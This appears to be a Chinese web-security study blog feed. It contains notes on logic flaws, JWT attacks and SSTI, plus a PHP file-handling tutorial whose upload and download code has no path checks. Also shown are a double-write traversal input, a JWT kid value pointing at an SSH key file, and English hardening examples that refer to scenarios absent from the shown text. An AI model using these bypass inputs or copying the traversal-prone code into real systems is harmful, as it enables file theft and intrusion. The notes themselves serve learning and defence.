title="代码逻辑引起漏洞"></a>代码逻辑引起漏洞</h4><h5 id="上传文件时的目录遍历"><a href="#上传文件时的目录遍历" class="headerlink" title="上传文件时的目录遍历"></a>上传文件时的目录遍历</h5><ul><li>web应用可能设置了在上传文件文件的目录禁止执行asp,php文件等(如imgs目录等)</li><li>如果将文件上传到程序根目录, 则可以被执行</li><li>如果过滤逻辑使用的是str_replace, 则只会过滤一次, 可以双写绕过,如<code>....//file.asp</code></li></ul><h5 id="身份认证绕过"><a href="#身份认证绕过" class="headerlink" title="身份认证绕过"></a>身份认证绕过</h5><ul><li>键值逻辑:使用键名键值进行对比验证错误</li><li>如: 需要验证s0, s1, s2, s3中任意一个的信息是否正确, 如果此时传入不存在的s10086, 并赋值为null, 则可以绕过验证</li></ul><h5 id="访问控制漏洞"><a href="#访问控制漏洞" class="headerlink" 
title="访问控制漏洞"></a>访问控制漏洞</h5><ul><li>查看隐藏属性: 已在前端源码, 只是没有显示在屏幕上</li></ul><h4 id="JWT攻击"><a href="#JWT攻击" class="headerlink" title="JWT攻击"></a>JWT攻击</h4><p><em><a href="https://www.cnblogs.com/yokan/p/14468030.html">JWT原理及常见攻击方式 - yokan - 博客园 (cnblogs.com)</a></em></p><h5 id="JWT样式"><a href="#JWT样式" class="headerlink" title="JWT样式"></a>JWT样式</h5><p>jwt的生成token格式如下,即:<strong>由 <code>.</code> 连接的三段字符串组成</strong></p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c</span></span><span class="line"><span style="color: #babed8"></span></span></code></pre></div><ul><li><p>第一段<strong>HEADER</strong>部分, 固定包含<strong>算法</strong>和token类型,对此json进行base64url加密</p><div class="language-json"><button title="Copy code" class="copy"></button><span class="lang">json</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C792EA">alg</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HS256</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C792EA">typ</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: 
#C3E88D">JWT</span><span style="color: #89DDFF">"</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div></li><li><p>第二段<strong>PAYLOAD</strong>部分, 包含一些数据,对此json进行base64url加密</p><div class="language-json"><button title="Copy code" class="copy"></button><span class="lang">json</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C792EA">sub</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">1234567890</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C792EA">name</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">John Doe</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C792EA">iat</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">1516239022</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div></li><li><p>第三段<strong>SIGNATURE</strong>部分,把前两段的base密文通过<code>.</code>拼接起来,然后对其进行<code>HS256</code>加密,再然后对<code>hs256</code>密文进行base64url加密,最终得到token的第三段</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" 
style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">base64url(HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), your-256-bit-secret (秘钥加盐)))</span></span></code></pre></div></li></ul><h5 id="几种攻击思路"><a href="#几种攻击思路" class="headerlink" title="几种攻击思路"></a>几种攻击思路</h5><ul><li><p>签名没验证空加密</p><ul><li>如果签名<code>alg</code>的值可以none, 也就是不加密签名, 签名的值就可以为空</li></ul></li><li><p>爆破密匙</p><ul><li>爆破前提:<ul><li>知悉JWT使用的加密算法</li><li>一段有效的、已签名的token</li><li>签名用的密钥不复杂(弱密钥)</li></ul></li><li>爆破工具<ul><li><a href="https://github.com/brendan-rius/c-jwt-cracker">brendan-rius/c-jwt-cracker: JWT brute force cracker written in C (github.com)</a></li></ul></li></ul></li><li><p>KID利用</p><ul><li><p><code>kid</code>是jwt header中的一个可选参数,全称是<code>key ID</code>,它用于指定加密算法的密钥</p><div class="language-json"><button title="Copy code" class="copy"></button><span class="lang">json</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C792EA">alg</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HS256</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C792EA">typ</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">jwt</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">,</span></span><span class="line"><span style="color: 
#BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C792EA">kid</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">:</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">/home/jwt/.ssh/pem</span><span style="color: #89DDFF">"</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div></li></ul></li></ul><h4 id="组件安全问题"><a href="#组件安全问题" class="headerlink" title="组件安全问题"></a>组件安全问题</h4><ul><li><p>Java项目本身安全性较高, 漏洞较少, 安全问题很多出自组件</p></li><li><p>如XStream的<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7285">CVE-2013-7285</a></p></li></ul><h3 id="JS项目-Node-Js框架"><a href="#JS项目-Node-Js框架" class="headerlink" title="JS项目&Node.Js框架"></a>JS项目&Node.Js框架</h3><h4 id="特性"><a href="#特性" class="headerlink" title="特性"></a>特性</h4><ul><li>默认能够得到源码, 相当于白盒测试</li></ul><h4 id="Js渗透测试"><a href="#Js渗透测试" class="headerlink" title="Js渗透测试"></a>Js渗透测试</h4><ul><li>在Javascript中也存在变量和函数,当存在可控变量及函数调用即可参数漏洞</li></ul><h4 id="判断js开发框架-nodejs-vue等"><a href="#判断js开发框架-nodejs-vue等" class="headerlink" title="判断js开发框架(nodejs, vue等)"></a>判断js开发框架(nodejs, vue等)</h4><ul><li>插件wappalyzer</li><li>cookie中有connect.sid</li><li>查看源代码</li><li>引入多个文件</li><li>文件结构如/static/js/app.js</li></ul><h4 id="安全漏洞"><a href="#安全漏洞" class="headerlink" title="安全漏洞"></a>安全漏洞</h4><ul><li>前端验证<ul><li>在前端通过返回状态码验证用户信息</li><li>可以被通过抓取返回数据包绕过</li></ul></li><li>url泄露</li><li>未授权访问</li></ul><h4 id="vulhub靶场"><a href="#vulhub靶场" class="headerlink" title="vulhub靶场"></a>vulhub靶场</h4><ul><li><p><a href="https://github.com/vulhub/vulhub">vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose (github.com)</a></p></li><li><p>启用靶场:</p><ul><li>进入指定漏洞的目录下如<code>httpd/CVE-xxxx-xxxxx</code></li><li>开启漏洞环境<code>docker compose up -d</code>(或<code>docker-compose</code>)</li><li>查看端口<code>docker compose 
ps</code></li></ul></li><li><p>关闭靶场</p><ul><li><code>docker compose down</code></li></ul></li></ul><h3 id="Python"><a href="#Python" class="headerlink" title="Python"></a>Python</h3><h4 id="反编译"><a href="#反编译" class="headerlink" title="反编译"></a>反编译</h4><ul><li><p>py文件编译后产生pyc文件</p></li><li><p>反编译平台:</p><ul><li><a href="https://tool.lu/pyc/">python反编译 - 在线工具 (tool.lu)</a></li><li><a href="http://tools.bugscaner.com/decompyle/">在线pyc,pyo,python,py文件反编译,目前支持python1.5到3.6版本的反编译-在线工具 (bugscaner.com)</a></li></ul></li><li><p>反编译工具</p><p><a href="https://github.com/zrax/pycdc">zrax/pycdc: C++ python bytecode disassembler and decompiler (github.com)</a></p></li></ul><h4 id="SSTI漏洞"><a href="#SSTI漏洞" class="headerlink" title="SSTI漏洞"></a>SSTI漏洞</h4><p><a href="https://blog.csdn.net/2301_77485708/article/details/132467976">【网络安全 | 1.5w字总结】SSTI漏洞入门,这一篇就够了。-CSDN博客</a></p><p><a href="https://www.cnblogs.com/bmjoker/p/13508538.html">1. SSTI(模板注入)漏洞(入门篇) - bmjoker - 博客园 (cnblogs.com)</a></p><ul><li>在<strong>多种编程语言</strong>都有这个漏洞(py, js, go, java)等</li></ul><h5 id="SSTI-–-服务器端模板注入漏洞"><a href="#SSTI-–-服务器端模板注入漏洞" class="headerlink" title="SSTI – 服务器端模板注入漏洞"></a>SSTI – 服务器端模板注入漏洞</h5><ul><li><p>原理: 服务端将输入作为web应用模板内容的一部分,在进行目标编译渲染的过程中,拼接了恶意语句,因此造成敏感信息泄露、远程命令执行等问题</p></li><li><p>分类:<br><img src="https://i0.imgs.ovh/2024/03/04/OYrRD.png" alt="OYrRD.png"></p></li><li><p>检测: 参数提交代码, 是否执行</p></li><li><p>案例: </p><div class="language-python"><button title="Copy code" class="copy"></button><span class="lang">python</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">name </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> request</span><span style="color: #89DDFF">.</span><span style="color: #F07178">args</span><span style="color: #89DDFF">.</span><span style="color: #82AAFF">get</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span 
style="color: #C3E88D">name</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">,</span><span style="color: #82AAFF"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">guest</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">)</span></span><span class="line"><span style="color: #BABED8">t </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">Template</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Hello </span><span style="color: #89DDFF">"</span><span style="color: #82AAFF"> </span><span style="color: #89DDFF">+</span><span style="color: #82AAFF"> name</span><span style="color: #89DDFF">)</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">return</span><span style="color: #BABED8"> t</span><span style="color: #89DDFF">.</span><span style="color: #82AAFF">render</span><span style="color: #89DDFF">()</span></span></code></pre></div><ul><li><p>正常情况下, 渲染后name应该直接被输出</p><p><img src="https://i0.imgs.ovh/2024/03/04/Oji9R.png" alt="Oji9R.png"></p></li><li><p>但如果用双大括号<code>{{}}</code>包裹参数值, 会被作为python代码执行</p><p><img src="https://i0.imgs.ovh/2024/03/04/OjUcN.png" alt="OjUcN.png"></p></li></ul></li><li><p>ctf案例:</p><ul><li><p><a href="https://buuoj.cn/challenges#[WesternCTF2018]shrine">BUUCTF在线评测 (buuoj.cn)</a></p></li><li><p><a href="https://blog.csdn.net/tscaxx/article/details/114483743">python学习笔记——flask之渲染模板(Jinja2)-特殊变量和方法_jinja2 flash-CSDN博客</a></p></li></ul></li></ul>]]></content>
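<p>As an added example (not code from the original post), the loose checks from scenarios 4 to 7 side by side with strict replacements. Function names are the example's own and every input is constructed inline; the PHP 7 versus PHP 8 behaviour noted in the comments follows the language's documented comparison rules.</p>

```php
<?php
// Added example, not code from the original post: the loose checks from
// scenarios 4-7 next to strict replacements. All inputs are constructed here.

// Scenario 4: numeric strings may carry leading whitespace, so "\n666" == "666".
function equals_loose(string $a, string $b): bool { return $a == $b; }
function equals_strict(string $a, string $b): bool { return $a === $b; }

// Scenario 5: in_array() without the third argument compares with ==, so the
// leading-numeric string "1ex" matches 1 on PHP 7 (PHP 8 compares it as a string
// and returns false). The strict variant does not depend on the PHP version.
function page_allowed_loose($page): bool {
    return in_array($page, [1, 2, 3]);
}
function page_allowed_strict($page): bool {
    // Accept only an all-digit string, cast it, then compare with ===
    return is_string($page) && ctype_digit($page)
        && in_array((int) $page, [1, 2, 3], true);
}

// Scenario 6: preg_match() on an array returns NULL with a warning on PHP 7
// (a TypeError on PHP 8), so "if (preg_match(...)) die()" silently lets
// ?num[]=1 through. Fail closed: non-strings are rejected, and a regex error
// (preg_match() returning false) is treated as "reject" as well.
function digits_rejected_strict($num): bool {
    if (!is_string($num)) {
        return true;                               // arrays and other types are rejected
    }
    return preg_match('/[0-9]/', $num) !== 0;      // 1 = digit found, false = error
}

// Scenario 7: a single str_replace() pass turns "sselectelect" into "select".
function strip_keyword_once(string $s): string {
    return str_replace('select', '', $s);
}
function strip_keyword_repeated(string $s): string {
    // Repeat until a pass changes nothing. Rejecting the input outright (or using
    // prepared statements for SQL) is the real fix; this only shows the difference.
    do {
        $before = $s;
        $s = str_ireplace('select', '', $s);
    } while ($s !== $before);
    return $s;
}

// Constructed inputs that trigger each bypass; returns [name => [loose, strict]].
// The loose preg_match() call is left out because it throws on PHP 8.
function run_checks(): array {
    return [
        'newline_equals' => [equals_loose("\n666", '666'), equals_strict("\n666", '666')],
        'in_array_1ex'   => [page_allowed_loose('1ex'), page_allowed_strict('1ex')],
        'preg_on_array'  => [null, digits_rejected_strict(['1'])],
        'str_replace'    => [strip_keyword_once('sselectelect'), strip_keyword_repeated('sselectelect')],
    ];
}

foreach (run_checks() as $name => [$loose, $strict]) {
    printf("%-15s loose=%s strict=%s\n", $name, var_export($loose, true), var_export($strict, true));
}
```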
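<p>As an added example (not code from the original post or the linked article), an HS256 verifier that closes the three attack paths listed above: the algorithm is pinned server-side so <code>alg: none</code> is rejected, the signature is checked with a constant-time compare, and <code>kid</code> is only ever used as a lookup key into a server-side map, never as a file path. The function names, the key map and the secret are this example's own constructed values.</p>

```php
<?php
// Added example, not code from the original post: HS256 signing and verification
// with the algorithm pinned, constant-time signature comparison and kid used only
// as a key into a server-side map. Secret and tokens below are constructed demo values.

function b64url_encode(string $data): string {
    return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}

function b64url_decode(string $data) {
    $pad = str_repeat('=', (4 - strlen($data) % 4) % 4);
    return base64_decode(strtr($data, '-_', '+/') . $pad, true);   // false on bad input
}

function jwt_sign_hs256(array $payload, string $secret, string $kid): string {
    $header = ['alg' => 'HS256', 'typ' => 'JWT', 'kid' => $kid];
    $input  = b64url_encode(json_encode($header)) . '.' . b64url_encode(json_encode($payload));
    return $input . '.' . b64url_encode(hash_hmac('sha256', $input, $secret, true));
}

// Returns the payload on success, null on any failure; $keys maps kid => secret.
function jwt_verify_hs256(string $token, array $keys): ?array {
    $parts = explode('.', $token);
    if (count($parts) !== 3) {
        return null;
    }
    [$h, $p, $s] = $parts;
    $header = json_decode((string) b64url_decode($h), true);
    if (!is_array($header) || ($header['alg'] ?? null) !== 'HS256') {
        return null;                                   // algorithm is not negotiable
    }
    $kid = $header['kid'] ?? null;
    if (!is_string($kid) || !array_key_exists($kid, $keys)) {
        return null;                                   // unknown kid: no file or db lookup
    }
    $given    = b64url_decode($s);
    $expected = hash_hmac('sha256', "$h.$p", $keys[$kid], true);
    if ($given === false || !hash_equals($expected, $given)) {
        return null;                                   // empty or forged signature
    }
    $payload = json_decode((string) b64url_decode($p), true);
    if (!is_array($payload) || (isset($payload['exp']) && $payload['exp'] < time())) {
        return null;                                   // malformed or expired
    }
    return $payload;
}

// Constructed demo: one valid token and two tokens shaped like the attacks above.
$keys  = ['k1' => 'constructed-demo-secret-do-not-reuse'];
$valid = jwt_sign_hs256(['sub' => '1234567890', 'name' => 'John Doe', 'exp' => time() + 600], $keys['k1'], 'k1');
[$h, $p]  = explode('.', $valid);
$alg_none = b64url_encode(json_encode(['alg' => 'none', 'typ' => 'JWT', 'kid' => 'k1'])) . ".$p.";
$bad_kid  = jwt_sign_hs256(['sub' => '1'], 'guessed-secret', 'not-a-known-kid');

var_dump(jwt_verify_hs256($valid, $keys) !== null);    // the genuine token is accepted
var_dump(jwt_verify_hs256($alg_none, $keys));          // rejected before any MAC is computed
var_dump(jwt_verify_hs256($bad_kid, $keys));           // rejected: kid not in the map
```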
<summary type="html"><h3 id="ASP安全"><a href="#ASP安全" class="headerlink" title="ASP安全"></a>ASP security</h3><ul>
<li>Common stack: windows+IIS+ASP+Access(sql server)</li>
</ul>
</summary>
<category term="网络安全" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="学习日志" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
<category term="小迪安全" scheme="https://myprefer.github.io/tags/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/"/>
<category term="WEB攻防" scheme="https://myprefer.github.io/tags/WEB%E6%94%BB%E9%98%B2/"/>
</entry>
<entry>
<title>PHP Development</title>
<link href="https://myprefer.github.io/post/PHP%E5%BC%80%E5%8F%91.html"/>
<id>https://myprefer.github.io/post/PHP%E5%BC%80%E5%8F%91.html</id>
<published>2024-02-28T10:59:34.000Z</published>
<updated>2024-03-03T15:03:56.772Z</updated>
<content type="html"><![CDATA[<h3 id="文件操作"><a href="#文件操作" class="headerlink" title="文件操作"></a>File operations</h3><h4 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>File upload</h4>
<div class="language-php"><pre><code>&lt;form action="" method="post" enctype="multipart/form-data"&gt;
    &lt;input type="text" name="username"&gt;
    &lt;input type="file" name="upload" multiple="multiple"&gt;
    &lt;input type="submit" value="提交"&gt;
&lt;/form&gt;
&lt;?php
if ($_FILES) {
    $name = $_FILES['upload']['name'];
    $tmp_name = $_FILES['upload']['tmp_name'];

    // the client-supplied file name is used as-is to build the target path
    if (!move_uploaded_file($tmp_name, './files/' . $name)) {
        echo "&lt;br&gt;文件上传失败!&lt;br&gt;";
    }
}
?&gt;
</code></pre></div>
<h4 id="文件下载"><a href="#文件下载" class="headerlink" title="文件下载"></a>File download</h4>
<h5 id="直连下载"><a href="#直连下载" class="headerlink" title="直连下载"></a>Direct-link download</h5>
<p>Only file types that the protocol serves as downloads (exe, zip, etc.) can be fetched this way, which is slightly safer</p>
<div class="language-php"><pre><code>&lt;?php
function get_url_download($filename) {
    $url = 'http://' . $_SERVER['HTTP_HOST'] . '/files/' . $filename;
    header("location:$url");
}
?&gt;
</code></pre></div>
<h5 id="传参下载"><a href="#传参下载" class="headerlink" title="传参下载"></a>Parameterized download</h5>
<div class="language-php"><pre><code>&lt;?php
function get_down($filename) {
    $filedir = './files/';
    // $filename is joined to $filedir without validation; nothing here rejects ../ sequences
    if (!file_exists($filedir.$filename)) {
        header('HTTP/1.1 404 NOT FOUND');
    } else {
        $file = fopen($filedir.$filename, 'rb');
        Header("Content-type: application/octet-stream");
        Header("Accept-Ranges: bytes");
        Header("Accept-Length: " . filesize($filedir . $filename));
        Header("Content-Disposition: attachment; filename=" . $filename);

        echo fread($file, filesize($filedir.$filename));
        fclose($file);

        exit();
    }
}
?&gt;
</code></pre></div>
<h4 id="文件删除"><a href="#文件删除" class="headerlink" title="文件删除"></a>File deletion</h4>
<h5 id="文件删除-1"><a href="#文件删除-1" class="headerlink" title="文件删除"></a>File deletion</h5>
<div class="language-php"><pre><code>$file_path = './files/'.$filename;
if (file_exists($file_path)) {
    unlink($file_path);
    echo '文件删除成功';
} else {
    echo '文件不存在';
}
</code></pre></div>
<h5 id="文件夹删除"><a href="#文件夹删除" class="headerlink" title="文件夹删除"></a>Directory deletion</h5><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">dir_path </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">./files/</span><span style="color: #89DDFF">'.</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">dirname</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">is_dir</span><span style="color: #89DDFF">($</span><span style="color: 
#BABED8">dir_path</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">rmdir</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">dir_path</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">目录删除成功</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">目录不存在</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div><h4 id="文件读取"><a href="#文件读取" class="headerlink" title="文件读取"></a>文件读取</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">filepath </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">./files/</span><span style="color: #89DDFF">'.</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">;</span></span><span class="line"><span 
style="color: #89DDFF">$</span><span style="color: #BABED8">file </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">fopen</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filepath</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">r</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">or</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">die</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">无法打开文件!</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D"><h4>文件内容:</h4></span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">fread</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">filesize</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filepath</span><span style="color: #89DDFF">));</span></span><span class="line"><span style="color: #82AAFF">fclose</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">);</span></span></code></pre></div><h4 id="文件写入"><a href="#文件写入" class="headerlink" title="文件写入"></a>文件写入</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki 
material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">filepath </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">./files/</span><span style="color: #89DDFF">'.</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">file </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">fopen</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filepath</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">a+</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">or</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">die</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">无法打开文件!</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">fwrite</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">txt</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">fclose</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">);</span></span></code></pre></div><h4 id="文件-目录列表读取"><a href="#文件-目录列表读取" class="headerlink" 
title="文件/目录列表读取"></a>文件/目录列表读取</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">dir </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">getcwd</span><span style="color: #89DDFF">();</span></span><span class="line"><span style="color: #676E95; font-style: italic">// $dir = __DIR__;</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">file </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">scandir</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">dir</span><span style="color: #89DDFF">.'</span><span style="color: #C3E88D">/files</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">foreach</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file </span><span style="color: #89DDFF">as</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">value</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">($</span><span style="color: #BABED8">value </span><span style="color: #89DDFF">!=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">.</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: 
#89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">value </span><span style="color: #89DDFF">!=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">..</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">value </span><span style="color: #89DDFF">.</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D"><br></span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div><h3 id="信息获取"><a href="#信息获取" class="headerlink" title="信息获取"></a>信息获取</h3><h4 id="获取用户IP"><a href="#获取用户IP" class="headerlink" title="获取用户IP"></a>获取用户IP</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">($</span><span style="color: #BABED8">HTTP_SERVER_VARS</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HTTP_X_FORWARDED_FOR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">])</span><span style="color: #BABED8"> </span><span style="color: 